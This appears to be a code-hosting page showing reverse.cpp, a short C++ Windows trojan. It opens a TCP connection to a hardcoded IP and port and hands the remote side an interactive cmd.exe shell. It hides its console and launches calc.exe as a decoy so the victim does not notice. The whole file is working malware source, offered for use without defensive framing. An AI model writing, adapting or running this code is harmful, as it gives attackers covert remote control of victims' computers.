-
Notifications
You must be signed in to change notification settings - Fork 13
/
reverse.cpp
71 lines (62 loc) · 2.76 KB
/
reverse.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
// AUTHOR : #Captain_Nemo
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#pragma comment(lib, "Ws2_32.lib") // indicates to the linker that the Ws2_32.lib file is required
#define DEF_BUFF 2048
void rsh(char* server, int Port)
{
while(true)
{
SOCKET sock1;
sockaddr_in address;
WSADATA ver;
WSAStartup(MAKEWORD(2,2), &ver);
sock1 = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); //create | initialize socket
address.sin_family = AF_INET; // std socket def
address.sin_addr.s_addr = inet_addr(server); // std socket def & initializing the ip from main() function
address.sin_port = htons(Port); // std socket def & initializing the port from main() function
WSAConnect(sock1, (SOCKADDR*)&address, sizeof(address), NULL, NULL, NULL, NULL); // Call WSAConnect Function for socket bind
char Rec_dat[DEF_BUFF];
memset(Rec_dat, 0, sizeof(Rec_dat));
int Rec_code = recv(sock1, Rec_dat, DEF_BUFF, 0); // define recieve code
if (Rec_code <= 0) {
closesocket(sock1);
WSACleanup();
continue;
} // end if
else {
char Proc[] = "cmd.exe"; // define process to be called
STARTUPINFO str_in;
PROCESS_INFORMATION proc_in;
memset(&str_in, 0, sizeof(str_in));
str_in.cb = sizeof(str_in);
str_in.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
str_in.hStdInput = str_in.hStdOutput = str_in.hStdError = (HANDLE) sock1; // passing process handle to socket
CreateProcess(NULL, Proc, NULL, NULL, TRUE, 0, NULL, NULL, &str_in, &proc_in); // create process cmd
WaitForSingleObject(proc_in.hProcess, INFINITE);
CloseHandle(proc_in.hProcess);
CloseHandle(proc_in.hThread);
memset(Rec_dat, 0, sizeof(Rec_dat));
int Rec_code = recv(sock1, Rec_dat, DEF_BUFF, 0);
if (Rec_code <= 0)
{
closesocket(sock1);
WSACleanup();
continue;
} // end if
if (strcmp(Rec_dat, "exit\n") == 0)
{
exit(0);
} // end if
} //end else
} // end while
} // end method rsh
int main() {
FreeConsole(); // clear console || allow trojan to run in the background
char h[] = "192.168.225.197"; // change the ip as per your own system's
int p = 8080;
system("start C:\\WINDOWS\\System32\\calc.exe"); // firing decoy process.
rsh(h, p);
return 0;
}